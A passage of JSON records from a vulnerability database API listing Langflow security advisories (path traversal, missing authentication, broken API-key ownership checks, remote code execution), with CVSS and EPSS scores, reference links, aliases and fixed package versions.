                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48061"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5p5r-57fx-pmfr",
                    "reference_id": "GHSA-5p5r-57fx-pmfr",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-5p5r-57fx-pmfr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/44822?format=api",
                    "purl": "pkg:pypi/langflow@1.0.19",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1dek-kvzf-27d1"
                        },
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-fc5h-qc2t-xqc3"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-wv26-29b9-vqgg"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        },
                        {
                            "vulnerability": "VCID-ztx2-wefa-c7bk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.19"
                }
            ],
            "aliases": [
                "CVE-2024-48061",
                "GHSA-5p5r-57fx-pmfr"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jt18-vv56-2fgx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37252?format=api",
            "vulnerability_id": "VCID-ncvf-vzqr-uydz",
            "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.1, in the download_profile_picture function of the /profile_pictures/{folder_name}/{file_name} endpoint, the folder_name and file_name parameters are not strictly filtered, which allows the secret_key to be read across directories. Version 1.7.1 contains a patch.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33497",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15912",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33497"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:45:18Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33497",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33497"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-ph9w-r52h-28p7",
                    "reference_id": "GHSA-ph9w-r52h-28p7",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-ph9w-r52h-28p7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api",
                    "purl": "pkg:pypi/langflow@1.7.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1"
                }
            ],
            "aliases": [
                "CVE-2026-33497",
                "GHSA-ph9w-r52h-28p7",
                "PYSEC-2026-81"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ncvf-vzqr-uydz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37246?format=api",
            "vulnerability_id": "VCID-q4r1-xjfk-7bg9",
            "summary": "Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33053",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00057",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18188",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33053"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.2"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:L"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T16:22:42Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33053",
                    "reference_id": "CVE-2026-33053",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33053"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rf6x-r45m-xv3w",
                    "reference_id": "GHSA-rf6x-r45m-xv3w",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-rf6x-r45m-xv3w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48830?format=api",
                    "purl": "pkg:pypi/langflow@1.7.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.2"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48845?format=api",
                    "purl": "pkg:pypi/langflow@1.9.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0"
                }
            ],
            "aliases": [
                "CVE-2026-33053",
                "GHSA-rf6x-r45m-xv3w",
                "PYSEC-2026-78"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-q4r1-xjfk-7bg9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49547?format=api",
            "vulnerability_id": "VCID-qwtw-q92t-quhz",
            "summary": "Langflow Missing Authentication on Critical API Endpoints\nMultiple critical API endpoints in Langflow are missing authentication controls, allowing any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21445",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.09015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.92791",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-21445"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/releases/tag/1.7.1"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21445",
                    "reference_id": "CVE-2026-21445",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21445"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-c5cp-vx83-jhqx",
                    "reference_id": "GHSA-c5cp-vx83-jhqx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-c5cp-vx83-jhqx"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx",
                    "reference_id": "GHSA-c5cp-vx83-jhqx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/48829?format=api",
                    "purl": "pkg:pypi/langflow@1.7.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-rrva-95s5-kbcf"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1"
                }
            ],
            "aliases": [
                "CVE-2026-21445",
                "GHSA-c5cp-vx83-jhqx"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qwtw-q92t-quhz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49830?format=api",
            "vulnerability_id": "VCID-rc54-gw71-gyau",
            "summary": "Langflow affected by Remote Code Execution via validate_code() exec()\nLangflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-0770",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.14653",
                            "scoring_system": "epss",
                            "scoring_elements": "0.94612",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-0770"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036"
                },
                {
                    "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py",
                    "reference_id": "CVE-2026-0770",
                    "reference_type": "exploit",
                    "scores": [],
                    "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0770",
                    "reference_id": "CVE-2026-0770",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0770"
                },
                {
                    "reference_url": "https://github.com/affix/CVE-2026-0770-PoC",
                    "reference_id": "CVE-2026-0770-POC",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/affix/CVE-2026-0770-PoC"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-g22f-v6f7-2hrh",
                    "reference_id": "GHSA-g22f-v6f7-2hrh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-g22f-v6f7-2hrh"
                },
                {
                    "reference_url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036/",
                    "reference_id": "ZDI-26-036",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T04:56:28Z/"
                        }
                    ],
                    "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-036/"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2026-0770",
                "GHSA-g22f-v6f7-2hrh"
            ],
            "risk_score": 10.0,
            "exploitability": "2.0",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rc54-gw71-gyau"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/36919?format=api",
            "vulnerability_id": "VCID-s17d-sfjq-z7eg",
            "summary": "langflow v1.0.12 was discovered to contain a remote code execution (RCE) vulnerability via the PythonCodeTool component.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-42835",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0911",
                            "scoring_system": "epss",
                            "scoring_elements": "0.92829",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-42835"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow"
                },
                {
                    "reference_url": "https://github.com/langflow-ai/langflow/issues/2908",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-31T18:26:22Z/"
                        }
                    ],
                    "url": "https://github.com/langflow-ai/langflow/issues/2908"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42835",
                    "reference_id": "CVE-2024-42835",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42835"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-56m6-4mhw-h3g5",
                    "reference_id": "GHSA-56m6-4mhw-h3g5",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-56m6-4mhw-h3g5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/44816?format=api",
                    "purl": "pkg:pypi/langflow@1.0.13",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1dek-kvzf-27d1"
                        },
                        {
                            "vulnerability": "VCID-1ynd-c2hz-53hx"
                        },
                        {
                            "vulnerability": "VCID-2195-gd33-xbdp"
                        },
                        {
                            "vulnerability": "VCID-2649-thqq-r3d2"
                        },
                        {
                            "vulnerability": "VCID-4swq-hbjm-3ucd"
                        },
                        {
                            "vulnerability": "VCID-9k4q-zwxf-euh1"
                        },
                        {
                            "vulnerability": "VCID-bb6r-1f6u-t7ed"
                        },
                        {
                            "vulnerability": "VCID-fc5h-qc2t-xqc3"
                        },
                        {
                            "vulnerability": "VCID-jt18-vv56-2fgx"
                        },
                        {
                            "vulnerability": "VCID-ncvf-vzqr-uydz"
                        },
                        {
                            "vulnerability": "VCID-q4r1-xjfk-7bg9"
                        },
                        {
                            "vulnerability": "VCID-qwtw-q92t-quhz"
                        },
                        {
                            "vulnerability": "VCID-rc54-gw71-gyau"
                        },
                        {
                            "vulnerability": "VCID-sbea-kkfu-akgb"
                        },
                        {
                            "vulnerability": "VCID-u8mw-7znw-rfab"
                        },
                        {
                            "vulnerability": "VCID-v5pc-pdm9-97g8"
                        },
                        {
                            "vulnerability": "VCID-wv26-29b9-vqgg"
                        },
                        {
                            "vulnerability": "VCID-ypxh-x2hy-3uhb"
                        },
                        {
                            "vulnerability": "VCID-ysnc-jyxb-6qcy"
                        },
                        {
                            "vulnerability": "VCID-zqwj-45w7-7kft"
                        },
                        {
                            "vulnerability": "VCID-ztx2-wefa-c7bk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.13"
                }
            ],
            "aliases": [
                "CVE-2024-42835",
                "GHSA-56m6-4mhw-h3g5",
                "PYSEC-2024-279"
            ],
            "risk_score": 4.4,
            "exploitability": "0.5",
            "weighted_severity": "8.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s17d-sfjq-z7eg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37168?format=api",
            "vulnerability_id": "VCID-sbea-kkfu-akgb",
